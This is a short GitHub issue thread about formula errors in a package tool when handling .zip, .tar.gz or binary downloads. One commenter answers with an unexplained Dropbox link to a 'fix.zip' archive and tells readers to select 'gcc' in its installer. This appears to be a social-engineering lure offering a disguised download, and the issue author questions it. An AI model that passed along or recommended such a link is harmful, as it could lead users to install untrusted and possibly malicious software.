### ISSUE TITLE
fix formula errors when downloading or moving files, check the formula links if they are .zip or .tar.gz or binary.

### ISSUE THREAD

**Issue by CodeDiego15** [CodeDiego15/LattePkg#11]

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by CodeDiego15** [comment]
what is it?

**Comment by CodeDiego15** [comment]
![Captura de Pantalla 2024-08-26 a la(s) 2 57 39 a  m](https://github.com/user-attachments/assets/12757a62-5a65-48b0-8b42-c99aad5e3a07)
example:
